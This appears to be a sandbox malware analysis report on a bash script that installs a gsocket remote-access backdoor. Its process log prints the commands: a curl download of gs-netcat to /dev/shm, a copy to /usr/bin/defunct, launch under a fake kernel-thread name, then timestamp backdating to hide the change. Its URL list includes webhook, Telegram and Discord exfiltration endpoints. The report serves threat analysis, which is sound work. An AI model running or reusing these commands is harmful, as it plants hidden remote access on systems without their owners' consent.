## Files

| File Path | Type | Category | Malicious | |
|---|---|---|---|---|
| y | Bourne-Again shell script, ASCII text executable | initial sample | | |
| /dev/shm/.gs-0/gs-netcat_mini-linux-x86_64 | ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), static-pie linked, stripped | dropped | | |
| /usr/bin/defunct | ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), static-pie linked, stripped | dropped | | |
## Processes

| Path | Cmdline | Malicious | |
|---|---|---|---|
| /usr/bin/bash | `/usr/bin/bash /tmp/y` | | |
| /usr/bin/bash | - | | |
| /usr/bin/bash | - | | |
| /usr/bin/bash | - | | |
| /usr/bin/sed | `sed s/[^a-zA-Z0-9]/\\\\&/g` | | |
| /usr/bin/bash | - | | |
| /usr/bin/bash | - | | |
| /usr/bin/bash | - | | |
| /usr/bin/sed | `sed s/[^a-zA-Z0-9]/\\\\&/g` | | |
| /usr/bin/bash | - | | |
| /usr/bin/bash | - | | |
| /usr/bin/bash | - | | |
| /usr/bin/sed | `sed s/[^a-zA-Z0-9]/\\\\&/g` | | |
| /usr/bin/bash | - | | |
| /usr/bin/bash | - | | |
| /usr/bin/bash | - | | |
| /usr/bin/sed | `sed s/[^a-zA-Z0-9]/\\\\&/g` | | |
| /usr/bin/bash | - | | |
| /usr/bin/bash | - | | |
| /usr/bin/bash | - | | |
| /usr/bin/sed | `sed s/[^a-zA-Z0-9]/\\\\&/g` | | |
| /usr/bin/bash | - | | |
| /usr/bin/bash | - | | |
| /usr/bin/bash | - | | |
| /usr/bin/sed | `sed s/[^a-zA-Z0-9]/\\\\&/g` | | |
| /usr/bin/bash | - | | |
| /usr/bin/bash | - | | |
| /usr/bin/bash | - | | |
| /usr/bin/sed | `sed s/[^a-zA-Z0-9]/\\\\&/g` | | |
| /usr/bin/bash | - | | |
| /usr/bin/bash | - | | |
| /usr/bin/bash | - | | |
| /usr/bin/sed | `sed s/[^a-zA-Z0-9]/\\\\&/g` | | |
| /usr/bin/bash | - | | |
| /usr/bin/bash | - | | |
| /usr/bin/bash | - | | |
| /usr/bin/sed | `sed s/[^a-zA-Z0-9]/\\\\&/g` | | |
| /usr/bin/bash | - | | |
| /usr/bin/bash | - | | |
| /usr/bin/bash | - | | |
| /usr/bin/sed | `sed s/[^a-zA-Z0-9]/\\\\&/g` | | |
| /usr/bin/bash | - | | |
| /usr/bin/bash | - | | |
| /usr/bin/bash | - | | |
| /usr/bin/sed | `sed s/[^a-zA-Z0-9]/\\\\&/g` | | |
| /usr/bin/bash | - | | |
| /usr/bin/bash | - | | |
| /usr/bin/bash | - | | |
| /usr/bin/sed | `sed s/[^a-zA-Z0-9]/\\\\&/g` | | |
| /usr/bin/bash | - | | |
| /usr/bin/uname | `uname -m` | | |
| /usr/bin/bash | - | | |
| /usr/bin/bash | - | | |
| /usr/bin/bash | - | | |
| /usr/bin/base64 | `base64 -w0` | | |
| /usr/bin/bash | - | | |
| /usr/bin/base64 | `base64 -d` | | |
| /usr/bin/bash | - | | |
| /usr/bin/bash | - | | |
| /usr/bin/bash | - | | |
| /usr/bin/bash | - | | |
| /usr/bin/sed | `sed s/[^a-zA-Z0-9]/\\\\&/g` | | |
| /usr/bin/bash | - | | |
| /usr/bin/bash | - | | |
| /usr/bin/pgrep | `pgrep defunct` | | |
| /usr/bin/bash | - | | |
| /usr/bin/bash | - | | |
| /usr/bin/pgrep | `pgrep (\\[kstrp\\]\|\\[watchdogd\\]\|\\[ksmd\\]\|\\[kswapd0\\]\|\\[card0\\-crtc8\\]\|\\[mm\\_percpu\\_wq\\]\|\\[rcu\\_preempt\\]\|\\[kworker\\]\|\\[raid5wq\\]\|\\[slub\\_flushwq\\]\|\\[netns\\]\|\\[kaluad\\])` | | |
| /usr/bin/bash | - | | |
| /usr/bin/bash | - | | |
| /bin/bash | `/bin/bash -c "echo TRUE"` | | |
| /usr/bin/bash | - | | |
| /usr/bin/dirname | `dirname /dev/shm/.gs-0` | | |
| /usr/bin/bash | - | | |
| /usr/bin/dirname | `dirname /dev/shm` | | |
| /usr/bin/bash | - | | |
| /usr/bin/bash | - | | |
| /usr/bin/date | `date -r /dev/shm +%Y%m%d%H%M.%S` | | |
| /usr/bin/bash | - | | |
| /usr/bin/dirname | `dirname /dev/shm/.gs-0` | | |
| /usr/bin/bash | - | | |
| /usr/bin/bash | - | | |
| /usr/bin/ls | `ls -atr /dev/shm` | | |
| /usr/bin/bash | - | | |
| /usr/bin/head | `head -n1` | | |
| /usr/bin/bash | - | | |
| /usr/bin/bash | - | | |
| /usr/bin/date | `date -r /dev/shm/.. +%Y%m%d%H%M.%S` | | |
| /usr/bin/bash | - | | |
| /usr/bin/mkdir | `mkdir /dev/shm/.gs-0` | | |
| /usr/bin/bash | - | | |
| /usr/bin/chmod | `chmod 700 /dev/shm/.gs-0` | | |
| /usr/bin/bash | - | | |
| /usr/bin/bash | - | | |
| /usr/bin/touch | `touch /dev/shm/.gs-0/.gs-rw.lock` | | |
| /usr/bin/bash | - | | |
| /usr/bin/rm | `rm -f /dev/shm/.gs-0/.gs-rw.lock` | | |
| /usr/bin/bash | - | | |
| /usr/bin/dirname | `dirname /usr/bin/defunct` | | |
| /usr/bin/bash | - | | |
| /usr/bin/dirname | `dirname /usr/bin` | | |
| /usr/bin/bash | - | | |
| /usr/bin/bash | - | | |
| /usr/bin/date | `date -r /usr/bin +%Y%m%d%H%M.%S` | | |
| /usr/bin/bash | - | | |
| /usr/bin/dirname | `dirname /usr/bin/defunct` | | |
| /usr/bin/bash | - | | |
| /usr/bin/bash | - | | |
| /usr/bin/ls | `ls -atr /usr/bin` | | |
| /usr/bin/bash | - | | |
| /usr/bin/head | `head -n1` | | |
| /usr/bin/bash | - | | |
| /usr/bin/bash | - | | |
| /usr/bin/date | `date -r /usr/bin/dirsplit +%Y%m%d%H%M.%S` | | |
| /usr/bin/bash | - | | |
| /usr/bin/touch | `touch /usr/bin/defunct` | | |
| /usr/bin/bash | - | | |
| /usr/bin/chmod | `chmod 600 /usr/bin/defunct` | | |
| /usr/bin/bash | - | | |
| /usr/bin/bash | - | | |
| /usr/bin/basename | `basename /bin/true` | | |
| /usr/bin/bash | - | | |
| /usr/bin/dirname | `dirname /usr/bin/defunct` | | |
| /usr/bin/bash | - | | |
| /usr/bin/bash | - | | |
| /usr/bin/bash | - | | |
| /usr/bin/bash | - | | |
| /usr/bin/bash | - | | |
| /usr/bin/bash | - | | |
| /usr/bin/base64 | `base64 -w0` | | |
| /usr/bin/bash | - | | |
| /usr/bin/bash | - | | |
| /usr/bin/bash | - | | |
| /usr/bin/bash | - | | |
| /usr/bin/base64 | `base64 -w0` | | |
| /usr/bin/bash | - | | |
| /usr/bin/bash | - | | |
| /usr/bin/bash | - | | |
| /usr/bin/bash | - | | |
| /usr/bin/base64 | `base64 -w0` | | |
| /usr/bin/bash | - | | |
| /usr/bin/bash | - | | |
| /usr/bin/curl | `curl -fsSL --connect-timeout 7 -m900 --retry 3 https://cdn.gsocket.io/bin/gs-netcat_mini-linux-x86_64 --output /dev/shm/.gs-0/gs-netcat_mini-linux-x86_64` | | |
| /usr/bin/bash | - | | |
| /usr/bin/mv | `mv /dev/shm/.gs-0/gs-netcat_mini-linux-x86_64 /dev/shm/.gs-0/gs-netcat` | | |
| /usr/bin/bash | - | | |
| /usr/bin/dirname | `dirname /usr/bin/defunct` | | |
| /usr/bin/bash | - | | |
| /usr/bin/rm | `rm -f /usr/bin/defunct` | | |
| /usr/bin/bash | - | | |
| /usr/bin/dirname | `dirname /usr/bin/defunct` | | |
| /usr/bin/bash | - | | |
| /usr/bin/touch | `touch /usr/bin/defunct` | | |
| /usr/bin/bash | - | | |
| /usr/bin/chmod | `chmod 600 /usr/bin/defunct` | | |
| /usr/bin/bash | - | | |
| /usr/bin/cp | `cp /dev/shm/.gs-0/gs-netcat /usr/bin/defunct` | | |
| /usr/bin/bash | - | | |
| /usr/bin/dirname | `dirname /dev/shm/.gs-0/gs-netcat` | | |
| /usr/bin/bash | - | | |
| /usr/bin/rm | `rm -f /dev/shm/.gs-0/gs-netcat` | | |
| /usr/bin/bash | - | | |
| /usr/bin/chmod | `chmod 700 /usr/bin/defunct` | | |
| /usr/bin/bash | - | | |
| /usr/bin/bash | - | | |
| /usr/bin/defunct | `/usr/bin/defunct -g` | | |
| /usr/bin/bash | - | | |
| /usr/bin/defunct | `[slub_flushwq]` | | |
| /usr/bin/bash | - | | |
| /usr/bin/rm | `rm -rf /dev/shm/.gs-0/*` | | |
| /usr/bin/bash | - | | |
| /usr/bin/rmdir | `rmdir /dev/shm/.gs-0` | | |
| /usr/bin/bash | - | | |
| /usr/bin/touch | `touch -t 202410010411.39 /dev/shm` | | |
| /usr/bin/bash | - | | |
| /usr/bin/touch | `touch -t 202109170423.51 /usr/bin` | | |
| /usr/bin/bash | - | | |
| /usr/bin/touch | `touch -t 200611251713.29 /usr/bin/defunct` | | |
## URLs

| Name | IP | Malicious | |
|---|---|---|---|
| `https://www.gsocket.io/deploy/` | unknown | | |
| `https://cdn.gsocket.io` | unknown | | |
| `https://github.com/hackerschoice/gsocket-relay` | unknown | | |
| `https://cdn.gsocket.io/bin/gs-netcat_mini-linux-x86_64` | 92.60.39.208 | | |
| `https://foo.blah/log.php?s=` | unknown | | |
| `https://gsocket.io` | unknown | | |
| `https://t.me/thcorg$` | unknown | | |
| `https://webhook.site` | unknown | | |
| `https://github.com/hackerschoice/gsocket/releases$` | unknown | | |
| `https://webhook.site/$` | unknown | | |
| `https://api.telegram.org/bot$` | unknown | | |
| `https://discord.com/api/webhooks/$` | unknown | | |
| `https://gsocket.io/x)` | unknown | | |
## Domains

| Name | IP | Malicious | |
|---|---|---|---|
| cdn.gsocket.io | 92.60.39.208 | | |
| c.gs.thc.org | 45.14.164.3 | | |
## IPs

| IP | Domain | Country | Malicious | |
|---|---|---|---|---|
| 92.60.39.208 | cdn.gsocket.io | Germany | | |
| 109.202.202.202 | unknown | Switzerland | | |
| 45.14.164.3 | c.gs.thc.org | Germany | | |
| 91.189.91.43 | unknown | United Kingdom | | |
| 91.189.91.42 | unknown | United Kingdom | | |